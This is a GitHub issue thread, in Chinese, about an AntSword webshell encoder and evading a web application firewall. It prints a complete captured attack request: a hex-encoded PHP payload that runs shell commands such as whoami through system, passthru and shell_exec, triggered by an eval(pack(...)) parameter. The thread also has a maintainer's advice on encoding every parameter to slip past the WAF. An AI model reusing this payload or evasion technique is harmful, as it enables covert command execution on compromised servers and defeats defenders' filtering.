New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
编码器绕过WAF的bug #185
Labels
Comments
所有要发送的数据都在 data 这个变量里面,你用个 for 循环就OK了:
需要注意的是,payload 里面对这一部分解码的时候是写死的 base64_decode, 所以,如果你全转成自己的编码了,你需要在 shell 那一侧先对 $_POST 里面的数据进行一次转换 |
给你一个样例,你可以参考一下:
|
Medicean
added a commit
to AntSwordProject/AwesomeEncoder
that referenced
this issue
Jun 3, 2019
确实我也遇到过这个问题 |
但是好像在==后面再加字符就太明显了.... |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
你好,我在使用蚁剑编码器的过程中,写了一个php hex的编码器
使用上面的编码器,确实可以把参数进行hex编码,并且绕过了WAF。
但是在执行系统命令的时候,却被WAF拦截了,我抓包看了一下数据包,发现发送的数据包是下面的
0x692baee12c5a1=L2Jpbi9zaA%3D%3D&0x88a4326879dc8=Y2QgIi9vcHQvbGFtcHAvaHRkb2NzL3dlYjE2MDUwNS9VcGxvYWRzL1BpY3R1cmUvMjAxNi0wNS0yNyI7d2hvYW1pO2VjaG8gW1NdO3B3ZDtlY2hvIFtFXQ%3D%3D&_0x649657e994c51=40696e695f7365742822646973706c61795f6572726f7273222c20223022293b407365745f74696d655f6c696d69742830293b66756e6374696f6e206173656e6328246f7574297b72657475726e20246f75743b7d3b66756e6374696f6e2061736f757470757428297b246f75747075743d6f625f6765745f636f6e74656e747328293b6f625f656e645f636c65616e28293b6563686f20223738346265223b6563686f20406173656e6328246f7574707574293b6563686f20226138323966223b7d6f625f737461727428293b7472797b24703d6261736536345f6465636f646528245f504f53545b22307836393262616565313263356131225d293b24733d6261736536345f6465636f646528245f504f53545b22307838386134333236383739646338225d293b24643d6469726e616d6528245f5345525645525b225343524950545f46494c454e414d45225d293b24633d7375627374722824642c302c31293d3d222f223f222d63205c227b24737d5c22223a222f63205c227b24737d5c22223b24723d227b24707d207b24637d223b66756e6374696f6e206665282466297b24643d6578706c6f646528222c222c40696e695f676574282264697361626c655f66756e6374696f6e732229293b696628656d70747928246429297b24643d617272617928293b7d656c73657b24643d61727261795f6d617028277472696d272c61727261795f6d61702827737472746f6c6f776572272c246429293b7d72657475726e2866756e6374696f6e5f65786973747328246629262669735f63616c6c61626c6528246629262621696e5f61727261792824662c246429293b7d3b66756e6374696f6e2072756e636d64282463297b247265743d303b6966286665282773797374656d2729297b4073797374656d2824632c24726574293b7d656c73656966286665282770617373746872752729297b4070617373746872752824632c24726574293b7d656c7365696628666528277368656c6c5f657865632729297b7072696e7428407368656c6c5f6578656328246329293b7d656c736569662866652827657865632729297b40657865632824632c246f2c24726574293b7072696e74286a6f696e28220a222c246f29293b7d656c736569662866652827706f70656e2729297b2466703d40706f70656e2824632c277227293b7768696c6528214066656f662824667029297b7072696e7428406667657473282466702c203230343829293b7d4070636c6f736528246670293b7d656c736569662866652827616e7473797374656d2729297b40616e7473797374656d282463293b7d656c73657b24726574203d203132373b7d72657475726e20247265743b7d3b247265743d4072756e636d642824722e2220323e263122293b7072696e74202824726574213d30293f227265743d7b247265747d223a22223b3b7d636174636828457863657074696f6e202465297b6563686f20224552524f523a2f2f222e24652d3e6765744d65737361676528293b7d3b61736f757470757428293b64696528293b&pwd=206576616c287061636b2822482a222c245f504f53545b225f307836343936353765393934633531225d29293b
后面的编码确实是hex编码的,这个可以绕过WAF,但是前面面的
0x692baee12c5a1
和0x88a4326879dc8
却是base64编码的,这是系统自动生成的。就是这个base64编码的部分被WAF查杀了请问,怎么才能让我的数据包是全部编码的,而不是部分编码的
The text was updated successfully, but these errors were encountered: